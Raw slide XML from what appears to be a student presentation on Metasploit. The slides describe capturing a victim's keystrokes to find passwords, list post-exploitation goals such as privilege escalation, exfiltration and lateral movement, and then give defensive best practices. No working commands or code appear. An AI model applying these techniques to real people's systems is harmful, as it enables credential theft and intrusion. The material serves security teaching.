  <p:transition spd="slow">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B880-14CE-5EB8-9324-CA102B4510F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AF4C9F6-6372-B05C-1592-29A57EAEC07F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="529936"/>
            <a:ext cx="10983191" cy="5933209"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can scan the keystrokes of the keyboard of the victim and we can see what he wrote or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mybe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> we can find his passwords also like this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>We can just type exit and we can end the opened session.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE78B4C0-6690-CA1F-BC66-D31F70CBC14C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="634133" y="1535034"/>
            <a:ext cx="5325218" cy="1124107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3820520086"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:comb/>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F119-C763-19F6-D303-4DEE68B59F2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="618518"/>
            <a:ext cx="9905998" cy="1044027"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="5300" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Use Cases and Examples</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="3600" b="1"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2966DB34-6AD1-85EB-0289-F9EA9BFA20FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1039092" y="1485900"/>
            <a:ext cx="10008320" cy="4753582"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Vulnerability Assessment:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Use Metasploit to scan and assess the security of computer systems and networks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Identify vulnerabilities and potential entry points for attackers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Generate reports and recommendations for remediation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Penetration Testing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Conduct controlled and authorized attacks using Metasploit to evaluate the effectiveness of security measures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Test the resilience of systems, applications, and networks to real-world attack scenarios.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Provide recommendations for improving security controls and mitigating vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4199635712"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:comb/>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6914-C4AE-E7C0-4DAD-223C48E28AA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1141413" y="-1523999"/>
            <a:ext cx="9905998" cy="11853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1CEBD98-9BB1-6BE4-B65E-ADA93741DC27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="883227" y="0"/>
            <a:ext cx="11308772" cy="6858000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Exploit Development:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Develop custom exploits and payloads using Metasploit's flexible framework.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Discover and exploit new vulnerabilities before malicious actors can take advantage of them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Contribute to the security community by sharing new exploits and techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Post-Exploitation Activities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Utilize Metasploit's post-exploitation modules to maintain control and conduct further activities on a compromised system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>calate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> privileges, exfiltrate data, pivot within the network, and perform lateral movement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Evaluate the impact and potential consequences of successful attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Incident Response:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Leverage Metasploit for forensic analysis during incident response activities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Explore compromised systems, gather evidence, and identify the extent of a security incident.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Assist in remediation efforts and secure affected systems to prevent further attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1430766054"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:comb/>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97410-FCBE-A281-238A-F2C5A0F431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287717-8741-412F-9B63-C317EF42DE3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="618518"/>
            <a:ext cx="9905999" cy="5172683"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Red Team Engagements:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Engage in simulated adversarial activities using Metasploit as part of a Red Team exercise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Mimic real-world attackers to test the effectiveness of an organization's security controls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Provide insights into potential weaknesses and help enhance the overall security posture.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1302118839"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:comb/>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E0331-4C5D-65BB-A011-46BCD6488822}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="0"/>
            <a:ext cx="9905998" cy="1558636"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="4800" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>best cyber security practices</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="3600" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343541"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DF7E9DB-01B1-91AB-E8AD-7ACE263DCF12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="914400"/>
            <a:ext cx="9905999" cy="5621482"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Regular Patching and Updates:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Ensure all software, operating systems, and applications are up to date with the latest security patches. This helps protect against known vulnerabilities that attackers might exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Strong Access Controls:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Implement strong authentication mechanisms, such as multi-factor authentication (MFA), to add an extra layer of security and prevent unauthorized access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Least Privilege Principle:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Limit user privileges to only what is necessary for their roles. Users should have the minimum level of access required to perform their tasks, reducing the potential impact of a compromised account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Network Segmentation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Divide your network into segments or zones to minimize the lateral movement of attackers. Implement firewalls and access controls to restrict communication between different segments.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="591047518"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:comb/>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D6E93-3A36-09FD-C189-81A7838F783F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1141413" y="-238992"/>
            <a:ext cx="9905998"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E8640B4-CDF8-67E9-F57B-0A08CB6776D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="955964" y="274318"/>
            <a:ext cx="10183091" cy="5904117"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Intrusion Detection and Prevention Systems (IDPS):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Deploy IDPS tools that monitor network traffic, detect suspicious activities, and prevent potential attacks. These systems can identify and block malicious activities, including exploits commonly used by tools like Metasploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Endpoint Protection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Use reputable antivirus and antimalware software on all devices. Ensure it is regularly updated to detect and block known threats, including malware payloads delivered through exploits.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Security Awareness Training:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Educate employees about common cyber threats, social engineering techniques, and safe online practices. Regular training can help them identify and avoid potential attacks, reducing the risk of successful exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Regular Backups:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Perform regular backups of critical data and store them securely offline or in the cloud. This mitigates the impact of ransomware attacks or other destructive incidents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
